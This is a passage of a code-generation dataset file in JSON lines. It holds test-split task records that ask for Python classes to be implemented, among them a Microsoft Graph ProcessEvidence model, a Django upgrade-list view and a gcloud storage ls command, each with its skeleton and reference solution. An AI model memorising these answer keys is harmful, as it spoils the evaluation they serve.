null.')\nsuper().serialize(writer)\nwriter.write_enum_value('detectionStatus', self.detection_status)\nwriter.write_object_value('imageFile', self.image_file)\nwriter.write_str_value('mdeDeviceId', self.mde_device_id)\nwriter.write_datetime_value('parentProcessCreationDateTime', self.parent_process_creation_date_time)\nwriter.write_int_value('parentProcessId', self.parent_process_id)\nwriter.write_object_value('parentProcessImageFile', self.parent_process_image_file)\nwriter.write_str_value('processCommandLine', self.process_command_line)\nwriter.write_datetime_value('processCreationDateTime', self.process_creation_date_time)\nwriter.write_int_value('processId', self.process_id)\nwriter.write_object_value('userAccount', self.user_account)"], "bodies_text": "<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return ProcessEvidence()\n<|end_body_0|>\n\n<|body_start_1|>\n from .alert_evidence import AlertEvidence\n from .detection_status import DetectionStatus\n from .file_details import FileDetails\n from .user_account import UserAccount\n from .alert_evidence import AlertEvidence\n from .detection_status import DetectionStatus\n from .file_details import FileDetails\n from .user_account import UserAccount\n fields: Dict[str, Callable[[Any], None]] = {'detectionStatus': lambda n: setattr(self, 'detection_status', n.get_enum_value(DetectionStatus)), 'imageFile': lambda n: setattr(self, 'image_file', n.get_object_value(FileDetails)), 'mdeDeviceId': lambda n: setattr(self, 'mde_device_id', n.get_str_value()), 'parentProcessCreationDateTime': lambda n: setattr(self, 'parent_process_creation_date_time', n.get_datetime_value()), 'parentProcessId': lambda n: setattr(self, 'parent_process_id', n.get_int_value()), 'parentProcessImageFile': lambda n: setattr(self, 'parent_process_image_file', n.get_object_value(FileDetails)), 'processCommandLine': lambda n: setattr(self, 'process_command_line', n.get_str_value()), 'processCreationDateTime': lambda n: setattr(self, 'process_creation_date_time', n.get_datetime_value()), 'processId': lambda n: setattr(self, 'process_id', n.get_int_value()), 'userAccount': lambda n: setattr(self, 'user_account', n.get_object_value(UserAccount))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_enum_value('detectionStatus', self.detection_status)\n writer.write_object_value('imageFile', self.image_file)\n writer.write_str_value('mdeDeviceId', self.mde_device_id)\n writer.write_datetime_value('parentProcessCreationDateTime', self.parent_process_creation_date_time)\n writer.write_int_value('parentProcessId', self.parent_process_id)\n writer.write_object_value('parentProcessImageFile', self.parent_process_image_file)\n writer.write_str_value('processCommandLine', self.process_command_line)\n writer.write_datetime_value('processCreationDateTime', self.process_creation_date_time)\n writer.write_int_value('processId', self.process_id)\n writer.write_object_value('userAccount', self.user_account)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "ProcessEvidence", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ProcessEvidence:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> ProcessEvidence:\n \"\"\"Creates a new instance of the appropriate class 
based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: ProcessEvidence\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return ProcessEvidence()\n<|end_body_0|>\n\n<|body_start_1|>\n from .alert_evidence import AlertEvidence\n from .detection_status import DetectionStatus\n from .file_details import FileDetails\n from .user_account import UserAccount\n from .alert_evidence import AlertEvidence\n from .detection_status import DetectionStatus\n from .file_details import FileDetails\n from .user_account import UserAccount\n fields: Dict[str, Callable[[Any], None]] = {'detectionStatus': lambda n: setattr(self, 'detection_status', n.get_enum_value(DetectionStatus)), 'imageFile': lambda n: setattr(self, 'image_file', n.get_object_value(FileDetails)), 'mdeDeviceId': lambda n: setattr(self, 'mde_device_id', n.get_str_value()), 'parentProcessCreationDateTime': lambda n: setattr(self, 'parent_process_creation_date_time', n.get_datetime_value()), 'parentProcessId': lambda n: setattr(self, 'parent_process_id', n.get_int_value()), 'parentProcessImageFile': lambda n: setattr(self, 'parent_process_image_file', n.get_object_value(FileDetails)), 'processCommandLine': lambda n: setattr(self, 'process_command_line', n.get_str_value()), 'processCreationDateTime': lambda n: setattr(self, 'process_creation_date_time', n.get_datetime_value()), 'processId': lambda n: setattr(self, 'process_id', n.get_int_value()), 'userAccount': lambda n: setattr(self, 'user_account', n.get_object_value(UserAccount))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_enum_value('detectionStatus', self.detection_status)\n writer.write_object_value('imageFile', self.image_file)\n writer.write_str_value('mdeDeviceId', self.mde_device_id)\n writer.write_datetime_value('parentProcessCreationDateTime', self.parent_process_creation_date_time)\n writer.write_int_value('parentProcessId', self.parent_process_id)\n writer.write_object_value('parentProcessImageFile', self.parent_process_image_file)\n writer.write_str_value('processCommandLine', self.process_command_line)\n writer.write_datetime_value('processCreationDateTime', self.process_creation_date_time)\n writer.write_int_value('processId', self.process_id)\n writer.write_object_value('userAccount', self.user_account)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000196", "length_bytes": 5608, "license_type": "permissive", "methods": [{"docstring": "Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: ProcessEvidence", "name": "create_from_discriminator_value", "signature": "def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> ProcessEvidence"}, {"docstring": "The deserialization 
information for the current model Returns: Dict[str, Callable[[ParseNode], None]]", "name": "get_field_deserializers", "signature": "def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]"}, {"docstring": "Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "name": "serialize", "signature": "def serialize(self, writer: SerializationWriter) -> None"}], "n_methods": 3, "prompt": "Implement the Python class `ProcessEvidence` described below.\n\nClass description:\nImplement the ProcessEvidence class.\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> ProcessEvidence: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: ProcessEvidence\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "prompted_full_text": "Implement the Python class `ProcessEvidence` described below.\n\nClass description:\nImplement the ProcessEvidence class.\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> ProcessEvidence: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: ProcessEvidence\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model\n\n<|skeleton|>\nclass ProcessEvidence:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> ProcessEvidence:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: ProcessEvidence\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return ProcessEvidence()\n<|end_body_0|>\n\n<|body_start_1|>\n from .alert_evidence import AlertEvidence\n from .detection_status import DetectionStatus\n from .file_details import FileDetails\n from .user_account import UserAccount\n from .alert_evidence import AlertEvidence\n from .detection_status import DetectionStatus\n from .file_details import FileDetails\n from .user_account import UserAccount\n fields: Dict[str, Callable[[Any], None]] = {'detectionStatus': lambda n: setattr(self, 'detection_status', n.get_enum_value(DetectionStatus)), 'imageFile': lambda n: 
setattr(self, 'image_file', n.get_object_value(FileDetails)), 'mdeDeviceId': lambda n: setattr(self, 'mde_device_id', n.get_str_value()), 'parentProcessCreationDateTime': lambda n: setattr(self, 'parent_process_creation_date_time', n.get_datetime_value()), 'parentProcessId': lambda n: setattr(self, 'parent_process_id', n.get_int_value()), 'parentProcessImageFile': lambda n: setattr(self, 'parent_process_image_file', n.get_object_value(FileDetails)), 'processCommandLine': lambda n: setattr(self, 'process_command_line', n.get_str_value()), 'processCreationDateTime': lambda n: setattr(self, 'process_creation_date_time', n.get_datetime_value()), 'processId': lambda n: setattr(self, 'process_id', n.get_int_value()), 'userAccount': lambda n: setattr(self, 'user_account', n.get_object_value(UserAccount))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_enum_value('detectionStatus', self.detection_status)\n writer.write_object_value('imageFile', self.image_file)\n writer.write_str_value('mdeDeviceId', self.mde_device_id)\n writer.write_datetime_value('parentProcessCreationDateTime', self.parent_process_creation_date_time)\n writer.write_int_value('parentProcessId', self.parent_process_id)\n writer.write_object_value('parentProcessImageFile', self.parent_process_image_file)\n writer.write_str_value('processCommandLine', self.process_command_line)\n writer.write_datetime_value('processCreationDateTime', self.process_creation_date_time)\n writer.write_int_value('processId', self.process_id)\n writer.write_object_value('userAccount', self.user_account)\n<|end_body_2|>\n", "revision_id": "27de7ccbe688d7614b2f6bde0fdbcda4bc5cc949", "skeleton": "<|skeleton|>\nclass ProcessEvidence:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> ProcessEvidence:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: ProcessEvidence\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ProcessEvidence:\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> ProcessEvidence:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: ProcessEvidence\"\"\"\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return ProcessEvidence()\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n from .alert_evidence import AlertEvidence\n from .detection_status import DetectionStatus\n from .file_details import FileDetails\n from .user_account import UserAccount\n 
from .alert_evidence import AlertEvidence\n from .detection_status import DetectionStatus\n from .file_details import FileDetails\n from .user_account import UserAccount\n fields: Dict[str, Callable[[Any], None]] = {'detectionStatus': lambda n: setattr(self, 'detection_status', n.get_enum_value(DetectionStatus)), 'imageFile': lambda n: setattr(self, 'image_file', n.get_object_value(FileDetails)), 'mdeDeviceId': lambda n: setattr(self, 'mde_device_id', n.get_str_value()), 'parentProcessCreationDateTime': lambda n: setattr(self, 'parent_process_creation_date_time', n.get_datetime_value()), 'parentProcessId': lambda n: setattr(self, 'parent_process_id', n.get_int_value()), 'parentProcessImageFile': lambda n: setattr(self, 'parent_process_image_file', n.get_object_value(FileDetails)), 'processCommandLine': lambda n: setattr(self, 'process_command_line', n.get_str_value()), 'processCreationDateTime': lambda n: setattr(self, 'process_creation_date_time', n.get_datetime_value()), 'processId': lambda n: setattr(self, 'process_id', n.get_int_value()), 'userAccount': lambda n: setattr(self, 'user_account', n.get_object_value(UserAccount))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_enum_value('detectionStatus', self.detection_status)\n writer.write_object_value('imageFile', self.image_file)\n writer.write_str_value('mdeDeviceId', self.mde_device_id)\n writer.write_datetime_value('parentProcessCreationDateTime', self.parent_process_creation_date_time)\n writer.write_int_value('parentProcessId', self.parent_process_id)\n writer.write_object_value('parentProcessImageFile', self.parent_process_image_file)\n writer.write_str_value('processCommandLine', self.process_command_line)\n writer.write_datetime_value('processCreationDateTime', self.process_creation_date_time)\n writer.write_int_value('processId', self.process_id)\n writer.write_object_value('userAccount', self.user_account)\n", "source": "the_stack_v2_python_sparse", "source_path": "msgraph/generated/models/security/process_evidence.py", "source_repo": "microsoftgraph/msgraph-sdk-python", "split": "test", "star_events_count": 135} {"blob_id": "c475f91975fc5c7382c11142e7a0df106e06df1f", "bodies": ["agent_now = request.user.userinfo.agent\nu_type = request.query_params.get('u_type')\nfilter_data = dict()\nif u_type and u_type in ['center', 'monitor', 'scan', 'defense', 'cloud_defense', 'hids', 'nids']:\n filter_data['u_type'] = u_type\nupgrade_tasks = models.SystemUpgradeTask.objects.filter(agent=agent_now, **filter_data)\n'\\n - task_id 升级任务ID\\n - name 中心名称\\n - current_version 当前版本\\n - upgrade_version 升级版本\\n - status 状态,0-未完成,1-完成,2-错误\\n - percent 完成百分比\\n '\nupgrade_list = []\nfor u_task in upgrade_tasks:\n upgrade_list.append({'task_id': u_task.id, 'name': u_task.target_name, 'current_version': u_task.target_version, 'upgrade_version': u_task.file_version, 'status': u_task.status, 'percent': u_task.percent})\nstatus_list = upgrade_tasks.values_list('status', flat=True)\nstatus = 0\nif 0 in status_list:\n status = 1\ncontext = {'status': 200, 'msg': '获取列表成功', 'data': {'status': status, 'list': upgrade_list}}\nreturn Response(context)", "agent_now = request.user.userinfo.agent\nupgrade_ser = 
serializers.SystemUpgradeSerializers(data=request.data, context={'request': request, 'agent': agent_now})\nif upgrade_ser.is_valid():\n upgrade_detail = upgrade_ser.save()\nelse:\n msg = '添加升级任务错误'\n for error in upgrade_ser.errors:\n msg = upgrade_ser.errors[error][0]\n break\n context = {'status': 500, 'msg': msg, 'error': upgrade_ser.errors}\n return Response(context)\nupgrade_targets(agent_now, upgrade_detail)\nreturn Response({'msg': '添加升级任务成功', 'status': 200})"], "bodies_text": "<|body_start_0|>\n agent_now = request.user.userinfo.agent\n u_type = request.query_params.get('u_type')\n filter_data = dict()\n if u_type and u_type in ['center', 'monitor', 'scan', 'defense', 'cloud_defense', 'hids', 'nids']:\n filter_data['u_type'] = u_type\n upgrade_tasks = models.SystemUpgradeTask.objects.filter(agent=agent_now, **filter_data)\n '\\n - task_id 升级任务ID\\n - name 中心名称\\n - current_version 当前版本\\n - upgrade_version 升级版本\\n - status 状态,0-未完成,1-完成,2-错误\\n - percent 完成百分比\\n '\n upgrade_list = []\n for u_task in upgrade_tasks:\n upgrade_list.append({'task_id': u_task.id, 'name': u_task.target_name, 'current_version': u_task.target_version, 'upgrade_version': u_task.file_version, 'status': u_task.status, 'percent': u_task.percent})\n status_list = upgrade_tasks.values_list('status', flat=True)\n status = 0\n if 0 in status_list:\n status = 1\n context = {'status': 200, 'msg': '获取列表成功', 'data': {'status': status, 'list': upgrade_list}}\n return Response(context)\n<|end_body_0|>\n\n<|body_start_1|>\n agent_now = request.user.userinfo.agent\n upgrade_ser = serializers.SystemUpgradeSerializers(data=request.data, context={'request': request, 'agent': agent_now})\n if upgrade_ser.is_valid():\n upgrade_detail = upgrade_ser.save()\n else:\n msg = '添加升级任务错误'\n for error in upgrade_ser.errors:\n msg = upgrade_ser.errors[error][0]\n break\n context = {'status': 500, 'msg': msg, 'error': upgrade_ser.errors}\n return Response(context)\n upgrade_targets(agent_now, upgrade_detail)\n return Response({'msg': '添加升级任务成功', 'status': 200})\n<|end_body_1|>\n", "class_docstring": "升级处理", "class_name": "SystemUpgradeList", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SystemUpgradeList:\n \"\"\"升级处理\"\"\"\n\n def get(self, request):\n \"\"\"升级列表 :param request: :return:\"\"\"\n <|body_0|>\n\n def post(self, request):\n \"\"\"添加升级 { { \"file_id\": 1, \"u_type\": \"center\", \"targets\": [ {\"uuid\": \"uuid-1\", \"id\": 1}, {\"uuid\": \"uuid-2\", \"id\": 2} ] } } :param request: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n agent_now = request.user.userinfo.agent\n u_type = request.query_params.get('u_type')\n filter_data = dict()\n if u_type and u_type in ['center', 'monitor', 'scan', 'defense', 'cloud_defense', 'hids', 'nids']:\n filter_data['u_type'] = u_type\n upgrade_tasks = models.SystemUpgradeTask.objects.filter(agent=agent_now, **filter_data)\n '\\n - task_id 升级任务ID\\n - name 中心名称\\n - current_version 当前版本\\n - upgrade_version 升级版本\\n - status 状态,0-未完成,1-完成,2-错误\\n - percent 完成百分比\\n '\n upgrade_list = []\n for u_task in upgrade_tasks:\n upgrade_list.append({'task_id': u_task.id, 'name': u_task.target_name, 'current_version': u_task.target_version, 'upgrade_version': u_task.file_version, 'status': u_task.status, 'percent': u_task.percent})\n status_list = upgrade_tasks.values_list('status', flat=True)\n status = 0\n if 0 in status_list:\n status = 1\n context = {'status': 200, 'msg': '获取列表成功', 'data': {'status': status, 
'list': upgrade_list}}\n return Response(context)\n<|end_body_0|>\n\n<|body_start_1|>\n agent_now = request.user.userinfo.agent\n upgrade_ser = serializers.SystemUpgradeSerializers(data=request.data, context={'request': request, 'agent': agent_now})\n if upgrade_ser.is_valid():\n upgrade_detail = upgrade_ser.save()\n else:\n msg = '添加升级任务错误'\n for error in upgrade_ser.errors:\n msg = upgrade_ser.errors[error][0]\n break\n context = {'status': 500, 'msg': msg, 'error': upgrade_ser.errors}\n return Response(context)\n upgrade_targets(agent_now, upgrade_detail)\n return Response({'msg': '添加升级任务成功', 'status': 200})\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000197", "length_bytes": 15651, "license_type": "no_license", "methods": [{"docstring": "升级列表 :param request: :return:", "name": "get", "signature": "def get(self, request)"}, {"docstring": "添加升级 { { \"file_id\": 1, \"u_type\": \"center\", \"targets\": [ {\"uuid\": \"uuid-1\", \"id\": 1}, {\"uuid\": \"uuid-2\", \"id\": 2} ] } } :param request: :return:", "name": "post", "signature": "def post(self, request)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006524", "prompt": "Implement the Python class `SystemUpgradeList` described below.\n\nClass description:\n升级处理\n\nMethod signatures and docstrings:\n- def get(self, request): 升级列表 :param request: :return:\n- def post(self, request): 添加升级 { { \"file_id\": 1, \"u_type\": \"center\", \"targets\": [ {\"uuid\": \"uuid-1\", \"id\": 1}, {\"uuid\": \"uuid-2\", \"id\": 2} ] } } :param request: :return:", "prompted_full_text": "Implement the Python class `SystemUpgradeList` described below.\n\nClass description:\n升级处理\n\nMethod signatures and docstrings:\n- def get(self, request): 升级列表 :param request: :return:\n- def post(self, request): 添加升级 { { \"file_id\": 1, \"u_type\": \"center\", \"targets\": [ {\"uuid\": \"uuid-1\", \"id\": 1}, {\"uuid\": \"uuid-2\", \"id\": 2} ] } } :param request: :return:\n\n<|skeleton|>\nclass SystemUpgradeList:\n \"\"\"升级处理\"\"\"\n\n def get(self, request):\n \"\"\"升级列表 :param request: :return:\"\"\"\n <|body_0|>\n\n def post(self, request):\n \"\"\"添加升级 { { \"file_id\": 1, \"u_type\": \"center\", \"targets\": [ {\"uuid\": \"uuid-1\", \"id\": 1}, {\"uuid\": \"uuid-2\", \"id\": 2} ] } } :param request: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n agent_now = request.user.userinfo.agent\n u_type = request.query_params.get('u_type')\n filter_data = dict()\n if u_type and u_type in ['center', 'monitor', 'scan', 'defense', 'cloud_defense', 'hids', 'nids']:\n filter_data['u_type'] = u_type\n upgrade_tasks = models.SystemUpgradeTask.objects.filter(agent=agent_now, **filter_data)\n '\\n - task_id 升级任务ID\\n - name 中心名称\\n - current_version 当前版本\\n - upgrade_version 升级版本\\n - status 状态,0-未完成,1-完成,2-错误\\n - percent 完成百分比\\n '\n upgrade_list = []\n for u_task in upgrade_tasks:\n upgrade_list.append({'task_id': u_task.id, 'name': u_task.target_name, 'current_version': u_task.target_version, 'upgrade_version': u_task.file_version, 'status': u_task.status, 'percent': u_task.percent})\n status_list = upgrade_tasks.values_list('status', flat=True)\n status = 0\n if 0 in status_list:\n status = 1\n context = {'status': 200, 'msg': '获取列表成功', 'data': {'status': status, 'list': upgrade_list}}\n return Response(context)\n<|end_body_0|>\n\n<|body_start_1|>\n agent_now = request.user.userinfo.agent\n upgrade_ser = serializers.SystemUpgradeSerializers(data=request.data, context={'request': request, 'agent': agent_now})\n if 
upgrade_ser.is_valid():\n upgrade_detail = upgrade_ser.save()\n else:\n msg = '添加升级任务错误'\n for error in upgrade_ser.errors:\n msg = upgrade_ser.errors[error][0]\n break\n context = {'status': 500, 'msg': msg, 'error': upgrade_ser.errors}\n return Response(context)\n upgrade_targets(agent_now, upgrade_detail)\n return Response({'msg': '添加升级任务成功', 'status': 200})\n<|end_body_1|>\n", "revision_id": "d6e025d7e9d9e3aecfd399c77f376130edd8a2df", "skeleton": "<|skeleton|>\nclass SystemUpgradeList:\n \"\"\"升级处理\"\"\"\n\n def get(self, request):\n \"\"\"升级列表 :param request: :return:\"\"\"\n <|body_0|>\n\n def post(self, request):\n \"\"\"添加升级 { { \"file_id\": 1, \"u_type\": \"center\", \"targets\": [ {\"uuid\": \"uuid-1\", \"id\": 1}, {\"uuid\": \"uuid-2\", \"id\": 2} ] } } :param request: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SystemUpgradeList:\n \"\"\"升级处理\"\"\"\n\n def get(self, request):\n \"\"\"升级列表 :param request: :return:\"\"\"\n agent_now = request.user.userinfo.agent\n u_type = request.query_params.get('u_type')\n filter_data = dict()\n if u_type and u_type in ['center', 'monitor', 'scan', 'defense', 'cloud_defense', 'hids', 'nids']:\n filter_data['u_type'] = u_type\n upgrade_tasks = models.SystemUpgradeTask.objects.filter(agent=agent_now, **filter_data)\n '\\n - task_id 升级任务ID\\n - name 中心名称\\n - current_version 当前版本\\n - upgrade_version 升级版本\\n - status 状态,0-未完成,1-完成,2-错误\\n - percent 完成百分比\\n '\n upgrade_list = []\n for u_task in upgrade_tasks:\n upgrade_list.append({'task_id': u_task.id, 'name': u_task.target_name, 'current_version': u_task.target_version, 'upgrade_version': u_task.file_version, 'status': u_task.status, 'percent': u_task.percent})\n status_list = upgrade_tasks.values_list('status', flat=True)\n status = 0\n if 0 in status_list:\n status = 1\n context = {'status': 200, 'msg': '获取列表成功', 'data': {'status': status, 'list': upgrade_list}}\n return Response(context)\n\n def post(self, request):\n \"\"\"添加升级 { { \"file_id\": 1, \"u_type\": \"center\", \"targets\": [ {\"uuid\": \"uuid-1\", \"id\": 1}, {\"uuid\": \"uuid-2\", \"id\": 2} ] } } :param request: :return:\"\"\"\n agent_now = request.user.userinfo.agent\n upgrade_ser = serializers.SystemUpgradeSerializers(data=request.data, context={'request': request, 'agent': agent_now})\n if upgrade_ser.is_valid():\n upgrade_detail = upgrade_ser.save()\n else:\n msg = '添加升级任务错误'\n for error in upgrade_ser.errors:\n msg = upgrade_ser.errors[error][0]\n break\n context = {'status': 500, 'msg': msg, 'error': upgrade_ser.errors}\n return Response(context)\n upgrade_targets(agent_now, upgrade_detail)\n return Response({'msg': '添加升级任务成功', 'status': 200})\n", "source": "the_stack_v2_python_sparse", "source_path": "soc_system/views/upgrade_views.py", "source_repo": "sundw2015/841", "split": "test", "star_events_count": 4} {"blob_id": "1f18aad35e93fee69c0335d3a5a23feedae1e087", "bodies": ["parser.add_argument('path', nargs='*', help='The path of objects and directories to list. The path must begin with gs:// and is allowed to contain wildcard characters.')\nparser.add_argument('-a', '--all-versions', action='store_true', help='Include non-current object versions in the listing. This flag is typically only useful for buckets with [object versioning](https://cloud.google.com/storage/docs/object-versioning) enabled. 
If combined with the `--long` option, the metageneration for each listed object is also included.')\nparser.add_argument('-b', '--buckets', action='store_true', help='When given a bucket URL, only return buckets. Useful for avoiding the rule that prints the top-level objects of buckets matching a query. Typically used in combination with `--full` to get the full metadata of buckets.')\nparser.add_argument('-e', '--etag', action='store_true', help='Include ETag metadata in listings that use the `--long` flag.')\nparser.add_argument('--format', help='Use \"gsutil\" to get the style of the older gsutil CLI. (e.g. \"--format=gsutil\"). Other format values (e.g. \"json\") do not work. See different ls flags and commands for alternative formatting.')\nparser.add_argument('--readable-sizes', action='store_true', help='When used with `--long`, print object sizes in human readable format, such as 1 KiB, 234 MiB, or 2 GiB.')\nparser.add_argument('-R', '-r', '--recursive', action='store_true', help='Recursively list the contents of any directories that match the path expression.')\noutput_styles = parser.add_group(mutex='True')\noutput_styles.add_argument('-l', '--long', action='store_true', help='For objects only. List size in bytes, creation time, and URL.')\noutput_styles.add_argument('-L', '--full', action='store_true', help='List all available metadata about items in rows.')\noutput_styles.add_argument('-j', '--json', action='store_true', help='List all available metadata about items as a JSON dump.')\nflags.add_additional_headers_flag(parser)\nflags.add_encryption_flags(parser, command_only_reads_data=True)\nflags.add_fetch_encrypted_object_hashes_flag(parser, is_list=True)", "encryption_util.initialize_key_store(args)\nuse_gsutil_style = flags.check_if_use_gsutil_style(args)\nfound_non_default_provider = False\nif args.path:\n storage_urls = [storage_url.storage_url_from_string(path) for path in args.path]\n for url in storage_urls:\n if not isinstance(url, storage_url.CloudUrl):\n raise errors.InvalidUrlError('Ls only works for cloud URLs. Error for: {}'.format(url.url_string))\n if url.scheme is not cloud_api.DEFAULT_PROVIDER:\n found_non_default_provider = True\nelse:\n storage_urls = [storage_url.CloudUrl(cloud_api.DEFAULT_PROVIDER)]\nif args.full:\n display_detail = ls_command_util.DisplayDetail.FULL\nelif args.json:\n display_detail = ls_command_util.DisplayDetail.JSON\nelif args.long:\n display_detail = ls_command_util.DisplayDetail.LONG\nelse:\n display_detail = ls_command_util.DisplayDetail.SHORT\nls_command_util.LsExecutor(storage_urls, all_versions=args.all_versions, buckets_flag=args.buckets, display_detail=display_detail, fetch_encrypted_object_hashes=args.fetch_encrypted_object_hashes, include_etag=args.etag, readable_sizes=args.readable_sizes, recursion_flag=args.recursive, use_gsutil_style=use_gsutil_style).list_urls()\nif found_non_default_provider and args.full:\n log.warning('For additional metadata information, please run ls --json.')"], "bodies_text": "<|body_start_0|>\n parser.add_argument('path', nargs='*', help='The path of objects and directories to list. The path must begin with gs:// and is allowed to contain wildcard characters.')\n parser.add_argument('-a', '--all-versions', action='store_true', help='Include non-current object versions in the listing. This flag is typically only useful for buckets with [object versioning](https://cloud.google.com/storage/docs/object-versioning) enabled. 
If combined with the `--long` option, the metageneration for each listed object is also included.')\n parser.add_argument('-b', '--buckets', action='store_true', help='When given a bucket URL, only return buckets. Useful for avoiding the rule that prints the top-level objects of buckets matching a query. Typically used in combination with `--full` to get the full metadata of buckets.')\n parser.add_argument('-e', '--etag', action='store_true', help='Include ETag metadata in listings that use the `--long` flag.')\n parser.add_argument('--format', help='Use \"gsutil\" to get the style of the older gsutil CLI. (e.g. \"--format=gsutil\"). Other format values (e.g. \"json\") do not work. See different ls flags and commands for alternative formatting.')\n parser.add_argument('--readable-sizes', action='store_true', help='When used with `--long`, print object sizes in human readable format, such as 1 KiB, 234 MiB, or 2 GiB.')\n parser.add_argument('-R', '-r', '--recursive', action='store_true', help='Recursively list the contents of any directories that match the path expression.')\n output_styles = parser.add_group(mutex='True')\n output_styles.add_argument('-l', '--long', action='store_true', help='For objects only. List size in bytes, creation time, and URL.')\n output_styles.add_argument('-L', '--full', action='store_true', help='List all available metadata about items in rows.')\n output_styles.add_argument('-j', '--json', action='store_true', help='List all available metadata about items as a JSON dump.')\n flags.add_additional_headers_flag(parser)\n flags.add_encryption_flags(parser, command_only_reads_data=True)\n flags.add_fetch_encrypted_object_hashes_flag(parser, is_list=True)\n<|end_body_0|>\n\n<|body_start_1|>\n encryption_util.initialize_key_store(args)\n use_gsutil_style = flags.check_if_use_gsutil_style(args)\n found_non_default_provider = False\n if args.path:\n storage_urls = [storage_url.storage_url_from_string(path) for path in args.path]\n for url in storage_urls:\n if not isinstance(url, storage_url.CloudUrl):\n raise errors.InvalidUrlError('Ls only works for cloud URLs. 
